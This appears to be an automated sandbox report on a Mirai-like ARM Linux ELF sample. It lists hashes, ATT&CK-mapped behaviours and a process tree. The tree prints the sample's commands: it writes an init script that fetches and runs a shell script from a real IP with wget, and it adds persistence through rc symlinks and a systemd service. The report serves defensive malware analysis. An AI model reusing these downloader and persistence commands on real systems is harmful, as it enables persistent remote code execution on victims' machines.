a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf

Analysis

max time kernel
150s
max time network
163s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
29-11-2024 03:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
Size

106KB
MD5

802705ada12322feada9ae8b21622414
SHA1

1320214d408933779c789988219f5c322716bb2d
SHA256

a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf
SHA512

b0b757fdff6b3755be6dc77bd6458f7a263fba7b1adcc71f9b4e6578bd09787b96be7f7fb1fe29015da40b5f258bb4e5debe19029b2ccdf658d96c750ef8f89d
SSDEEP

1536:1Qyw4JV7fhFCdD/oo6YjeP43rkIMNYt0OkJP7GRSEwaYIOE9IdHWbeev0EJnnMlU:1Qyw4JVapokVFt0JiRSEpKHSpJnnXC

Score

9^/10

defense_evasion discovery persistence privilege_escalation

Malware Config

Signatures

Contacts a large (15131) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 5 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
703	chmod
679	sh
681	chmod
698	sh
701	sh

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for modification	/dev/misc/watchdog	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf

Creates/modifies environment variables 1 TTPs 1 IoCs

Creating/modifying environment variables is a common persistence mechanism.

persistence privilege_escalation defense_evasion

Path Interception by PATH Environment Variable

T1574.007

description	ioc	Process
File opened for modification	/etc/profile	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf

Enumerates running processes
Discovers information about currently running processes on the system

Modifies init.d 2 TTPs 2 IoCs

Adds/modifies system service, likely for persistence.

persistence

Boot or Logon Autostart Execution

T1547

RC Scripts

T1037.004

description	ioc	Process
File opened for modification	/etc/init.d/sh	sh
File opened for modification	/etc/init.d/system	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf

Modifies rc script 2 TTPs 1 IoCs

Adding/modifying system rc scripts is a common persistence mechanism.

persistence

Boot or Logon Autostart Execution

T1547

RC Scripts

T1037.004

description	ioc	Process
File opened for modification	/etc/rc.local	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf

Modifies systemd 2 TTPs 1 IoCs

Adds/ modifies systemd service files. Likely to achieve persistence.

persistence privilege_escalation

XDG Autostart Entries

T1547.013

Systemd Service

T1543.002

description	ioc	Process
File opened for modification	/etc/systemd/system/custom.service	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf

Modifies Bash startup script 2 TTPs 1 IoCs

persistence

Boot or Logon Autostart Execution

T1547

Unix Shell Configuration Modification

T1546.004

description	ioc	Process
File opened for modification	/etc/profile	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf

Changes its process name 1 IoCs

description	pid	Process
Changes the process name, possibly in an attempt to hide itself	651	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf

Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/742/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/733/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/727/cmdline	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/740/cmdline	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/773/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/782/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/799/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/748/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/766/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/769/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/800/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/749/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/750/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/757/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/788/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/795/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/759/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/768/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/787/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/784/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/1/cgroup	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/734/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/736/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/741/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/747/cmdline	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/753/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/764/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/self/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/735/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/738/cmdline	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/758/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/777/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/789/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/792/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/732/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/722/cmdline	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/737/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/738/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/770/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/774/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/786/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/737/cmdline	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/771/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/728/cmdline	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/739/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/745/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/754/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/765/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/767/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/775/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/778/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/2/cmdline	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/779/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/781/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/790/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/791/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/740/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/748/cmdline	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/752/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/761/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/772/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
File opened for reading	/proc/780/status	a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf

/tmp/a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
/tmp/a762b324f2481e7d4d0389faefa42a57af8df112c208f19f1cfbe5861d9491bf.elf
1⤵
- Modifies Watchdog functionality
- Creates/modifies environment variables
- Modifies init.d
- Modifies rc script
- Modifies systemd
- Modifies Bash startup script
- Changes its process name
- Reads runtime system information
PID:651
- /bin/sh
  sh -c "systemctl enable custom.service >/dev/null 2>&1"
  2⤵
  PID:653
- - /bin/systemctl
    systemctl enable custom.service
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:661
- /bin/sh
  sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
  2⤵
  - File and Directory Permissions Modification
  PID:679
- - /bin/chmod
    chmod +x /etc/init.d/system
    3⤵
    - File and Directory Permissions Modification
    PID:681
- /bin/sh
  sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
  2⤵
  PID:690
- - /bin/ln
    ln -s /etc/init.d/system /etc/rcS.d/S99system
    3⤵
    PID:696
- /bin/sh
  sh -c "echo \"#!/bin/sh # /etc/init.d/sh case \\\"\$1\\\" in start) echo 'Starting sh' /bin/sh & wget http://193.143.1.70/ -O /tmp/lol.sh chmod +x /tmp/lol.sh /tmp/lol.sh & ;; stop) echo 'Stopping sh' killall sh ;; restart) \$0 stop \$0 start ;; *) echo \\\"Usage: \$0 {start|stop|restart}\\\" exit 1 ;; esac exit 0\" > /etc/init.d/sh"
  2⤵
  - File and Directory Permissions Modification
  - Modifies init.d
  PID:698
- /bin/sh
  sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
  2⤵
  - File and Directory Permissions Modification
  PID:701
- - /bin/chmod
    chmod +x /etc/init.d/sh
    3⤵
    - File and Directory Permissions Modification
    PID:703
- /bin/sh
  sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
  2⤵
  PID:707
- - /bin/mkdir
    mkdir -p /etc/rc.d
    3⤵
    PID:709
- /bin/sh
  sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
  2⤵
  PID:716
- - /bin/ln
    ln -s /etc/init.d/sh /etc/rc.d/S99sh
    3⤵
    PID:720

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

XDG Autostart Entries

T1547.013

Boot or Logon Initialization Scripts

T1037

RC Scripts

T1037.004

Create or Modify System Process

T1543

Systemd Service

T1543.002

Event Triggered Execution

T1546

Unix Shell Configuration Modification

T1546.004

Hijack Execution Flow

T1574

Path Interception by PATH Environment Variable

T1574.007

Privilege Escalation

Boot or Logon Autostart Execution

T1547

XDG Autostart Entries

T1547.013

Boot or Logon Initialization Scripts

T1037

RC Scripts

T1037.004

Create or Modify System Process

T1543

Systemd Service

T1543.002

Event Triggered Execution

T1546

Unix Shell Configuration Modification

T1546.004

Hijack Execution Flow

T1574

Path Interception by PATH Environment Variable

T1574.007

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Hijack Execution Flow

T1574

Path Interception by PATH Environment Variable

T1574.007

Impair Defenses

T1562

Credential Access

Discovery

Network Service Discovery

T1046

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/boot/bootcmd

Filesize
109B

MD5
735cae7d3cbab0f59d95f84790282103

SHA1
1cb77931b3097f18988016c9ceba3280a5ccb2ae

SHA256
dfdd4cf729384e4ed52516ab72bd86be286c80f53d4f5b764fd2dd2a2b2c983b

SHA512
998daa467c4ee63dd41515897728de70cbb9c579ca8b16c26d8e6db5edad53c6dbd6343fb10eda3dbc29b0cb1fa72a9b2653250e9027e6ee02d17726e958bbfe

Download Submit
/etc/init.d/sh

Filesize
353B

MD5
c5583b6a699f62cb0a004c99842f5c70

SHA1
b232ef89bf9b36643b5956aaacfd295b9ce2a0a7

SHA256
2b03c83558e4af71f3b35408cf668a2ee06931c21adec760952a21a11bc4c59b

SHA512
a9fc1e4c30452a3d100a8ccfbb707d9d323830fbbca90c98d3c126bf943539baaf1fccb04d435a4b627ed7f1bfb1bbd649dab282488d951dde87e097423e154d

Download Submit
/etc/init.d/system

Filesize
96B

MD5
f000251d92c773cc3ee1ca22cf5f0788

SHA1
e2386fe6a5f29b1e9e5ad5b38928c024f97105e6

SHA256
31a77745dd3724a0691a9255738b9c87516868932e3eb992e2afafcd0574a985

SHA512
0dad5adaa7742dd208596fefad53ab21c39fbf2cbe5c9958b92170d555d316f0a0b02ec5236311b869aa18e90592e81439a3a229bf1307b5daf87d87c5f493c2

Download Submit
/etc/inittab

Filesize
101B

MD5
3d6b6e1b05ad5d0538ccd8804bcd279b

SHA1
0fc061b51c225d5bea072c939de05e8a856558bc

SHA256
cab2df9c1c498df29445837610f14ae08d4af98d3acac69b0581c01fe594e3c5

SHA512
1957857cffbc0d526eb04e40db166d661b9dc59fc31fb5551f31cd58d270f839ffa2098e81c8555b12e9dbd55ba17df662b14c6441a6389eb9a76082fa401c98

Download Submit
/etc/systemd/system/custom.service

Filesize
290B

MD5
19a440fdac7f578f2fb33719698a082c

SHA1
ebadce21c65d05ad62a324deb39c57aecd3edf2c

SHA256
b176d41b748466f8ba35246c78a1c940f65403b363c086ccd5b5de577a87cf69

SHA512
8bdfac90e7235fc35eeec141a1e2145ed4ea5a250b71bdf0cf0e5e5aa59ab6dc004dc08561bd5547c4a4a106138c98950dc2098c905ce785b9b2c0657684d7bb

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads